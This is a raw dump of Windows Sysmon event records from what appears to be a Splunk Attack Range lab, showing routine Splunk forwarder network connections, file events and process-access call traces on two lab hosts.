11:30:29.071{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4290AEA079B7A07DF611B1A680879E22,SHA256=C49FAD2841347C67C0CFA86C77F14693D6D89DE89145A317373A930C0997D735,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:26.615{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49679-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:30.307{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=442CF55118C25FC70C51A423C599DB0F,SHA256=42A557F60AF599D7B00B08D206BB24822E7BC201D74C01F58318985D2B41E931,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223738Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:27.576{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51808-false10.0.1.12-8000- 23542300x8000000000000000223737Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:30.524{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=ED387A920B3C21EA8BE7E0FF59007BF0,SHA256=907A500268720FDABC0EB5616104C99204853657C093DBC33B129613E350345F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223736Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:30.087{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13DF5221586A3A5C10D78A815A2D76A7,SHA256=3A06360E8E8E5A01A92CF5EF914C7F5E2C517243E36C2EF27BD68F6CCD96914A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:31.322{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF2B11052B141F228652E78837E65533,SHA256=AD64135B31A307E81700EEB5220004BC6182CA05EDB3AF2F2F1E2DBD9D77A9AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223739Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:31.087{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73A7FFF8064F8ECD8E14111376ADB70B,SHA256=961A4EFC4E3B151C6333B2164351ACD635A350ECFE203BD0E4C7CB7DB353C407,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:32.353{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54B81EB4ADACDFEE7994E95442B4CF19,SHA256=02A88786F1478B083886E212E2DB1A5A786751E437037A5FE40E7467F1F94B01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223740Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:32.102{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64FFB084E6566CBEDEF0AE193CF32B27,SHA256=FC39539B529D5D9B0F337F8F1199C040A68DA5199D52052B60BA53173FB0ECF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:33.709{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=FC5586EECFFC83C3DF067A06DC12FC4C,SHA256=85A709810CFE891027EA4FD859D6B945F8375CB5E3E7E0AC1D1535F3A75E9213,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:33.425{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3065C19CDB45EC7738226C9A5BCBD505,SHA256=A3CDB89E4FA7993062741C2096437B369692F8E75167DE37B9F577A306E7BE7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223741Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:33.118{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9126D33F7734A35E380D7C5D865CAB01,SHA256=C50E499C5D877FA10FFAB6C5D3E2F998D3B98CD020E2C1545074DA2CD6C5F6BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:34.440{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C1525DB8B9383CD1AF2B52D62EBE1BB,SHA256=97C777A5CA9B65C2235E1FFEB1F50E96D1783B443F82BD5F007111ACA3226540,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223742Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:34.118{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1D1057B539F981E03AFDF90CF65C9BE,SHA256=80929B19E807317A381BA89F948C34D539695EE7B6D9C69AAE4912F2DEB1F8BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223744Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:35.133{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D851359A628C4F849834CC14877C7A07,SHA256=802C2FE1A7A9167BDC5E85B359E923459DE07F4AF042B73C0202A95D608E973D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:35.455{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03095B1A8D3FF9067DD5B91407848BD0,SHA256=35AE542A97D9B21F68168B8E7A79EB4564C0ECAE08264DA6AF5C08F1CCCF543A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:32.596{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49680-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000223743Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:32.669{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51809-false10.0.1.12-8000- 23542300x8000000000000000299993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:36.458{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40D21322B30060EEE336E2B4C676BF4E,SHA256=9B9B379221E5AC09A790E0E0E16C8EE97B68E2B3EAC67DD3AC8EA7293F5A041F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223745Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:36.149{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5B2AB01081FD9D60FA9725087D6ADF3,SHA256=BA98F4EEE73E466CDBBC6B96FC27335300BB0536D4D519B32466AF1A752FAD3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:37.494{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=440282997A8DD52ADE87F1E341C0B1D1,SHA256=3CAB9A446ACFE15F0A61F5AD2223498E365A3C58F4C40545FD724C29A4897D33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223746Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:37.164{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8517A01BA844439C7162962AB7FEAFE1,SHA256=781DB3EC76ED6B85681A4B2358833DCD41C0FABEB39A711FD2296327B1FCCDBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:38.526{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=761346FB558322C5C6C18AF7491B4D05,SHA256=D9B501B70FF5113C688AE9BD9918165C6CE37AF114CDF5C75359D6F8A36D6475,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223747Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:38.180{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5A99E43AF7DABDF82F49D04D47B677F,SHA256=00E86C385C6A41226B7E06C3CC3D2D7ED94609551D96E9553E1D668A0BDAAD28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223748Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:39.195{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACA6DCCCA2A5382E64A6F06F02561647,SHA256=2964FE9D6AF0437F3A3A97A9253937DE9C92B1D7340735A07B5A6BBDD7CA8561,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:39.540{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87C607E5395216EE33D8CB0132F0960E,SHA256=34CD364CE374FF9872C247F149D84EA0D668B52E68761D8E8996AAC33B262008,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:37.601{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49681-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:40.839{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:40.555{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEFB56E47F2C26C85F3C32E8176AD2AE,SHA256=17106335B40A6EE36CDCEBD2A1C2347178F0468C08F9BCD86F2CA079D6AF8679,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223750Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:40.211{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED9C2CE6816843965455F2E9174D9CBB,SHA256=C981CF36B940260856E40F80106A2CD17F79E930A94FFF70CB35374ECA8A284A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223749Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:37.716{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51810-false10.0.1.12-8000- 23542300x8000000000000000300000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:41.570{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76F011C996875CB14B7CFC9797717747,SHA256=0DD045B8140171B9C6563A50CCB1EF418FDACB428B21233F4F5551E6B4DB4745,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223751Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:41.226{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAB03E2E30739E47871B75ABEBEF4D3A,SHA256=69E0DB547CC3D16AF39CA69260A24F1734E5E19249768DBD3195F2A81583B245,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:42.571{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B17F387DB3700885EE7C3E5E490719B8,SHA256=018C87194D5DC6A1D89E9296FD010A044104B9E038C6FD18CDD584A13918F714,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223752Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:42.242{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7B21410127E743B094A2B85DF273E49,SHA256=0B7F8C81C489AE0633E91F76CCF7E4DCE9E9890B6E9CDFA78350697A1042D29E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:40.283{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49683-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000300003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:43.608{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E186854B383BBEC6FE6BE133BD9D888,SHA256=76B616227614FEF4E1D0E97FFBBAC0C94676A00AB02029E46FE439DB7ED48FA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223753Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:43.429{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2A729856AC926385111ADCE54119F2B,SHA256=24A95DE3B956C6DF3F53F96085F9FF60F47DDFCE7BB38F882144138D52B0343B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:44.639{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB8E06219EBF90953DAD46F77D5AE47D,SHA256=FF240F672927C661DAA9C2973B615DCDCD2913CB4926A3AE0B7251022A3A1845,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223781Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.711{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1AE4-6216-7205-000000003902}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223780Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.711{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223779Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.711{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223778Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.711{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223777Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.711{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223776Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:44.711{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.D